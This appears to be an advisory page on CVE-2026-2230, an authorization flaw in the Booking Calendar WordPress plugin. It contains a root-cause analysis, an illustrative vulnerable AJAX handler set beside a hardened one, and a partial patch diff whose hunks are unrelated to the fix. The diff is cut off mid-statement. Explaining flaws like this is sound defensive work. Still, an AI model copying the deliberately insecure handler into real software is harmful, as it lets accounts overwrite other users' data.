Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2230: Booking Calendar <= 10.14.14 – Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary User Settings Modification (booking)

CVE ID: CVE-2026-2230
Plugin: booking (Booking Calendar)
Severity: Medium (CVSS 4.3)
CWE: CWE-639 (Authorization Bypass Through User-Controlled Key)
Vulnerable Version: <= 10.14.14
Patched Version: 10.14.15
Disclosed: February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2230:
CVE-2026-2230 is an Insecure Direct Object Reference (IDOR, CWE-639: Authorization Bypass Through User-Controlled Key) in the Booking Calendar WordPress plugin (slug booking). An authenticated user with Subscriber-level access who has additionally been granted booking permissions can modify plugin settings that belong to other users. All versions up to and including 10.14.14 are affected; the issue is scored CVSS 4.3 (Medium).

Atomic Edge research places the root cause in the handle_ajax_save function, which processes the AJAX request that saves per-user plugin settings. The function reads the target user ID from a user-controlled key parameter in the request and uses it directly, without checking that the requester is that user or otherwise has the right to modify that user's settings. The missing control is an authorization check rather than input validation: the supplied value can be a perfectly well-formed user ID and still identify someone else's account.

Exploitation requires an authenticated account. The attacker needs at least Subscriber-level access and must also have been granted booking permissions by an Administrator, so a plain self-registered Subscriber without that grant cannot reach the vulnerable path. With that access, the attacker sends a crafted request to the WordPress admin-ajax.php endpoint for the action registered on the wp_ajax_wpbc_ajax_save_user_settings hook, substituting another user's ID in the user ID parameter. The save is then applied to that user's settings, such as booking calendar display options.

The patch adds an authorization check before the save is processed. handle_ajax_save now compares the requested user ID with the current user's ID and proceeds only when they match or when the current user holds the appropriate administrative privileges. Self-service saves continue to work; cross-user modification is rejected.
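As an added illustration of the root cause and of the shape of the fix described in the two paragraphs above, and not code from the Booking Calendar plugin: a minimal WordPress AJAX handler that saves per-user settings, first in the vulnerable form (target user taken from the request and trusted) and then hardened so the target is resolved from the session and a cross-user write needs a capability. The action name, the request fields user_id and settings, the user meta key and the nonce action are assumptions for the example. The whitelist-and-sanitize helper is shared by both handlers so the difference between them is only the authorization step.

```php
<?php
/**
 * Added example, not Booking Calendar code.
 * Hypothetical names: action 'demo_save_user_settings', request fields 'user_id' and
 * 'settings', user meta key 'demo_calendar_settings', nonce action 'demo_save_settings'.
 */

// Settings a user may set, each paired with the sanitizer applied to it.
function demo_allowed_settings() {
	return array(
		'show_calendar' => 'absint',               // 0 or 1
		'week_start'    => 'absint',               // 0..6
		'date_format'   => 'sanitize_text_field',
	);
}

// Keep only whitelisted keys and sanitize each value; unknown keys are dropped.
function demo_sanitize_settings( $raw ) {
	$clean = array();
	foreach ( demo_allowed_settings() as $key => $sanitizer ) {
		if ( isset( $raw[ $key ] ) ) {
			$clean[ $key ] = call_user_func( $sanitizer, wp_unslash( $raw[ $key ] ) );
		}
	}
	return $clean;
}

// VULNERABLE (CWE-639): the target user is whatever the request says it is.
function demo_handle_ajax_save_vulnerable() {
	// The nonce stops CSRF; it says nothing about whether the caller owns user_id.
	check_ajax_referer( 'demo_save_settings', 'nonce' );

	$target_user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
	$settings       = ( isset( $_POST['settings'] ) && is_array( $_POST['settings'] ) )
		? demo_sanitize_settings( $_POST['settings'] ) : array();

	// Any logged-in caller who reaches this hook can overwrite any user's settings.
	update_user_meta( $target_user_id, 'demo_calendar_settings', $settings );
	wp_send_json_success( array( 'user_id' => $target_user_id ) );
}

// HARDENED: resolve the target from the session; honour a different user_id only
// when the caller holds a capability that legitimately covers other users.
function demo_handle_ajax_save_hardened() {
	check_ajax_referer( 'demo_save_settings', 'nonce' );

	$current_user_id = get_current_user_id();
	if ( 0 === $current_user_id ) {
		wp_send_json_error( array( 'message' => 'not logged in' ), 401 );
	}

	// Default to the caller's own ID; a client that omits user_id is the common case.
	$requested = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : $current_user_id;

	if ( $requested !== $current_user_id && ! current_user_can( 'edit_users' ) ) {
		// Authorization failure: the key belongs to someone else and the caller is not an admin.
		wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
	}
	if ( $requested !== $current_user_id && ! get_userdata( $requested ) ) {
		wp_send_json_error( array( 'message' => 'no such user' ), 404 );
	}

	$settings = ( isset( $_POST['settings'] ) && is_array( $_POST['settings'] ) )
		? demo_sanitize_settings( $_POST['settings'] ) : array();

	update_user_meta( $requested, 'demo_calendar_settings', $settings );
	wp_send_json_success( array( 'user_id' => $requested ) );
}

// Only the hardened handler is registered. The wp_ajax_ prefix (without nopriv) means
// the hook runs for authenticated users only; that is the attacker's starting point here.
add_action( 'wp_ajax_demo_save_user_settings', 'demo_handle_ajax_save_hardened' );
```

When auditing a handler like handle_ajax_save, the line to find is the one that chooses the target user. If that value comes from the request rather than from get_current_user_id(), there must be a capability check between it and the write; a nonce check alone (check_ajax_referer) is CSRF protection and does not establish ownership, which is the mistake the vulnerable handler above makes.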

Successful exploitation lets an attacker alter another user's booking calendar settings, for example hiding booking interfaces or changing calendar behavior, which can make the booking system unusable for that user and disrupt business operations. The flaw does not by itself lead to privilege escalation or remote code execution; its impact is unauthorized modification of per-user data and the resulting service disruption.

Differential between vulnerable and patched code

The differential reproduced below covers changes to booking/core/wpbc-activation.php and booking/includes/_capacity/create_booking.php in the 10.14.14 to 10.14.15 update. None of the hunks shown touches handle_ajax_save, so the authorization check described above is not visible in this excerpt.

Code Diff
--- a/booking/core/wpbc-activation.php
+++ b/booking/core/wpbc-activation.php
@@ -56,31 +56,32 @@
 		return $links;

     }
-
-    /** Check if was updated from lower to  high version */
-    public function is_update_from_lower_to_high_version() {
-
-        $is_make_activation = false;

-	    // Check  conditions for different version about Upgrade
-	    if ( ( class_exists( 'wpdev_bk_personal' ) ) && ( ! wpbc_is_table_exists( 'bookingtypes' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_s' ) ) && ( wpbc_is_field_in_table_exists( 'booking', 'pay_request' ) == 0 ) ) {
-		    $is_make_activation = true;
-	    }
-	    																									// FixIn: 9.9.0.13.
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_m' ) ) && ( ! wpbc_is_table_exists( 'booking_seasons' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_l' ) ) && ( ! wpbc_is_table_exists( 'booking_coupons' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_multiuser' ) ) && ( wpbc_is_field_in_table_exists( 'booking_coupons', 'users' ) == 0 ) ) {
-		    $is_make_activation = true;
-	    }
-        return $is_make_activation;
-    }
+	/** Check if was updated from lower to  high version */
+	public function is_update_from_lower_to_high_version() {
+
+		$is_make_activation = false;
+
+		// Check  conditions for different version about Upgrade
+		if ( ( class_exists( 'wpdev_bk_personal' ) ) && ( ! wpbc_is_table_exists( 'bookingtypes' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_s' ) ) && ( wpbc_is_field_in_table_exists( 'booking', 'pay_request' ) == 0 ) ) {
+			$is_make_activation = true;
+		}
+		// FixIn: 9.9.0.13.
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_m' ) ) && ( ! wpbc_is_table_exists( 'booking_seasons' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_l' ) ) && ( ! wpbc_is_table_exists( 'booking_coupons' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_multiuser' ) ) && ( wpbc_is_field_in_table_exists( 'booking_coupons', 'users' ) == 0 ) ) {
+			$is_make_activation = true;
+		}
+
+		return $is_make_activation;
+	}

 }
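Review bot: this hunk is a whitespace-only reindent of is_update_from_lower_to_high_version (spaces to tabs, the "FixIn: 9.9.0.13." comment moved onto its own line) with no functional change, and it is unrelated to the authorization fix this release ships. Formatting-only changes belong in a separate commit so that the security diff stays reviewable; if it must stay, say so in the commit message.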

@@ -198,7 +199,7 @@
     // Options
 	// -----------------------------------------------------------------------------------------------------------------
     $default_options_to_add = wpbc_get_default_options();
-
+	// TODO: for Import / Export options,  we can  use this function to get all option_names and then just  get  the real  values from  the wp_options table.
     make_bk_action( 'wpbc_before_activation__add_options', $default_options_to_add );           // FixIn: 9.6.2.11.

     foreach ( $default_options_to_add as $default_option_name => $default_option_value ) {
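Review bot: the only change in this hunk replaces a blank line with a TODO about reusing wpbc_get_default_options() for import/export. A TODO is not a release change; track it in an issue rather than adding a comment line to a security update, or drop the hunk.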
@@ -210,92 +211,139 @@
     // DB Tables
 	// -----------------------------------------------------------------------------------------------------------------
     if ( true ){
-        global $wpdb;
-        $charset_collate = '';
-        //if ( $wpdb->has_cap( 'collation' ) ) {
-            if ( ! empty($wpdb->charset) ) $charset_collate = "DEFAULT CHARACTER SET $wpdb->charset";
-            if ( ! empty($wpdb->collate) ) $charset_collate .= " COLLATE $wpdb->collate";
-        //}
-
-        $wp_queries = array();
-        if ( ! wpbc_is_table_exists('booking') ) { // Check if tables not exist yet
-// FixIn: 10.0.0.1.
-            $simple_sql = "CREATE TABLE {$wpdb->prefix}booking (
-                     booking_id bigint(20) unsigned NOT NULL auto_increment, " .
-					 /*
-				   " booking_options TEXT,
-					 trash bigint(10) NOT NULL default 0,
-					 is_new bigint(10) NOT NULL default 1,
-					 sort_date datetime,
-					 modification_date datetime,
-					 creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
-					 status varchar(200) NOT NULL default '',
-					 sync_gid varchar(200) NOT NULL default '',
-					 is_trash datetime,
-					 hash TEXT, " .  /**/
-
-				   " form text ,
-                     booking_type bigint(10) NOT NULL default 1,
-                     PRIMARY KEY  (booking_id)
-                    ) {$charset_collate};";
+
+		global $wpdb;
+
+		// ----------------------------------------------------------------------------
+		// Charset / Collation
+		// ----------------------------------------------------------------------------
+		$charset_collate = '';
+		if ( ! empty( $wpdb->charset ) ) {
+			$charset_collate = "DEFAULT CHARACTER SET {$wpdb->charset}";
+		}
+		if ( ! empty( $wpdb->collate ) ) {
+			$charset_collate .= " COLLATE {$wpdb->collate}";
+		}
+
+		// ----------------------------------------------------------------------------
+		// Table name
+		// ----------------------------------------------------------------------------
+		$table_name = $wpdb->prefix . 'booking';
+
+		// ----------------------------------------------------------------------------
+		// Queries queue for upgrades only
+		// ----------------------------------------------------------------------------
+		$wp_queries = array();
+
+		// ----------------------------------------------------------------------------
+		// 1) First install: CREATE booking TABLE.
+		// ----------------------------------------------------------------------------
+		if ( ! wpbc_is_table_exists( 'booking' ) ) {
+
+			$create_sql = "CREATE TABLE {$table_name} (
+							booking_id bigint(20) unsigned NOT NULL auto_increment,
+							booking_type bigint(10) NOT NULL default 1,
+
+							form TEXT,
+							hash TEXT,
+							booking_options TEXT,
+							status varchar(200) NOT NULL default '',
+
+							is_new bigint(10) NOT NULL default 1,
+							sync_gid varchar(200) NOT NULL default '',
+							trash bigint(10) NOT NULL default 0,
+							is_trash datetime,
+
+							sort_date datetime,
+							modification_date datetime,
+							creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
+
+							PRIMARY KEY  (booking_id)
+						) {$charset_collate};";
+
 			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$wpdb->query( $simple_sql );
-        } elseif  (wpbc_is_field_in_table_exists('booking','form') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN form TEXT";   // FixIn: 10.12.1.5.
-        }
+			$wpdb->query( $create_sql );

-        if  (wpbc_is_field_in_table_exists('booking','modification_date') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN modification_date datetime"; // FixIn: 10.12.1.5.
-        }
+			// ----------------------------------------------------------------------------
+			// 2) Upgrade path: only add missing columns (your current logic)
+			// ----------------------------------------------------------------------------
+		} else {

-		// FixIn: 9.2.3.3.
-	    if ( wpbc_is_field_in_table_exists( 'booking', 'creation_date' ) == 0 ) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP";   // FixIn: 10.12.1.5.
-			/**
-			 *
-			// Can be only  one 'TIMESTAMP' field at  some servers.
-			//													   ADD COLUMN re_create_date TIMESTAMP NOT NULL DEFAULT 0
-			//$wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP";
-			 */
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'form' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN form TEXT";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','sort_date') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN sort_date datetime";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'modification_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN modification_date datetime";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','status') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN status varchar(200) NOT NULL default ''";  // FixIn: 10.12.1.5.
-        }
+			// FixIn: 9.2.3.3.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'creation_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','is_new') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN is_new bigint(10) NOT NULL default 1";   // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'sort_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN sort_date datetime";
+			}

-        // Version: 5.2 - Google ID of the booking for Sync functionality
-        if  (wpbc_is_field_in_table_exists('booking','sync_gid') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN sync_gid varchar(200) NOT NULL default ''";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'status' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN status varchar(200) NOT NULL default ''";
+			}

-	    // FixIn: 9.2.3.5.
-        if  (wpbc_is_field_in_table_exists('booking','is_trash') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN is_trash datetime";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'is_new' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN is_new bigint(10) NOT NULL default 1";
+			}

-        // FixIn: 6.1.1.10.
-        if  (wpbc_is_field_in_table_exists('booking','trash') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN trash bigint(10) NOT NULL default 0";  // FixIn: 10.12.1.5.
-        }
+			// Version: 5.2 - Google ID for Sync
+			if ( wpbc_is_field_in_table_exists( 'booking', 'sync_gid' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN sync_gid varchar(200) NOT NULL default ''";
+			}

+			// FixIn: 9.2.3.5.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'is_trash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN is_trash datetime";
+			}
+
+			// FixIn: 6.1.1.10.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'trash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN trash bigint(10) NOT NULL default 0";
+			}
+
+			// FixIn: 9.1.2.12.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'booking_options' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN booking_options TEXT";
+			}

+			if ( wpbc_is_field_in_table_exists( 'booking', 'hash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN hash TEXT";
+
+				// Update hash  value only in last 100 bookings.
+				$sql_check_table = "SELECT booking_id as id FROM {$wpdb->prefix}booking  ORDER BY booking_id DESC LIMIT 0, 100";
+
+				$res = $wpdb->get_results( $sql_check_table );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				foreach ( $res as $l ) {
+					$wp_queries[] = "UPDATE {$wpdb->prefix}booking SET hash = MD5('" . time() . '_' . wp_rand( 1000, 1000000 ) . "') WHERE booking_id = " . $l->id;  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				}
+			}
+		}
+
+		// ----------------------------------------------------------------------------
+		// Execute queued upgrade queries (only runs on upgrades, not new install)
+		// ----------------------------------------------------------------------------
+		if ( ! empty( $wp_queries ) ) {
+			foreach ( $wp_queries as $sql ) {
+				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				$wpdb->query( $sql );
+			}
+		}

-	    // FixIn: 9.1.2.12.
-	    if ( wpbc_is_field_in_table_exists( 'booking', 'booking_options' ) == 0 ) {
-		    $wp_queries[] = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN booking_options TEXT";  // FixIn: 10.12.1.5.
-	    }

 		$is_insert_test_bookings = false;

-		// FixIn: 8.7.9.1.
+		// ----------------------------------------------------------------------------
+		// 2. Install: CREATE bookingdate TABLE.
+		// ----------------------------------------------------------------------------
+
 		if ( ! wpbc_is_table_exists( 'bookingdates' ) ) {
 			// Check if tables not exist yet.
 			$simple_sql = "CREATE TABLE {$wpdb->prefix}bookingdates (
@@ -322,101 +370,73 @@
 			$wpdb->query( $simple_sql );
 		}

-
-		if ( count( $wp_queries ) > 0 ) {
-			foreach ( $wp_queries as $wp_q ) {
-				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-				$wpdb->query( $wp_q );
-			}
-
-			if ( $is_insert_test_bookings ) {
-				// -- Test Booking #1 --
-				$is_appr    = 1;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
-                     'text^name1^John~text^secondname1^Smith~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id        = $wpdb->insert_id;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 2 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 3 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 4 DAY", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				// -- Test Booking #2 --
-				$is_appr    = 0;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
-                     'text^name1^Emma~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^999-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id        = $wpdb->insert_id;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 28 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 29 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 30 DAY", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-
-				// -- Test Booking #3 --
-				$is_appr    = 1;
-				$start_time = '10:00';
-				$end_time   = '10:30';
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date, is_new ) VALUES (
-                     'selectbox^rangetime1^".$start_time." - ".$end_time."~text^name1^Sophia~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing a one day time slot booking.', " . wpbc_sql_date_math_expr_explicit('', 'now') . ", 0 );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id = $wpdb->insert_id;
-
-				$start_time_arr = explode( ':', $start_time );
-				$end_time_arr   = explode( ':', $end_time );
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved ) VALUES
-									( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $start_time_arr[0] ) ) . ':' . $start_time_arr[1] . ":01' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . " ),
-									( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $end_time_arr[0]   ) ) . ':' . $end_time_arr[1]   . ":02' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-
-			}
-		}
-
-	    // FixIn: 9.2.3.3.
-		if ( wpbc_is_field_in_table_exists( 'booking', 'hash' ) == 0 ) {  //HASH_EDIT
-
-			$simple_sql = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN hash TEXT";   // FixIn: 10.12.1.5.
-			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$wpdb->query( $simple_sql );
-
-			// Update hash  value only in last 100 bookings
-			$sql_check_table = "SELECT booking_id as id FROM {$wpdb->prefix}booking  ORDER BY booking_id DESC LIMIT 0, 100";
-
-			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$res = $wpdb->get_results( $sql_check_table );
-
-			foreach ( $res as $l ) {
-				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-				$wpdb->query( "UPDATE {$wpdb->prefix}booking SET hash = MD5('" . time() . '_' . wp_rand( 1000, 1000000 ) . "') WHERE booking_id = " . $l->id );
-			}
+		// ----------------------------------------------------------------------------
+		// 3. Insert test bookings.
+		// ----------------------------------------------------------------------------
+
+		if ( $is_insert_test_bookings ) {
+			// -- Test Booking #1 --
+			$is_appr    = 1;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
+				 'text^name1^John~text^secondname1^Smith~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id        = $wpdb->insert_id;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 2 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 3 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 4 DAY", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			// -- Test Booking #2 --
+			$is_appr    = 0;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
+				 'text^name1^Emma~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^999-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id        = $wpdb->insert_id;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 28 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 29 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 30 DAY", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+
+			// -- Test Booking #3 --
+			$is_appr    = 1;
+			$start_time = '10:00';
+			$end_time   = '10:30';
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date, is_new ) VALUES (
+				 'selectbox^rangetime1^".$start_time." - ".$end_time."~text^name1^Sophia~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing a one day time slot booking.', " . wpbc_sql_date_math_expr_explicit('', 'now') . ", 0 );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id = $wpdb->insert_id;
+
+			$start_time_arr = explode( ':', $start_time );
+			$end_time_arr   = explode( ':', $end_time );
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved ) VALUES
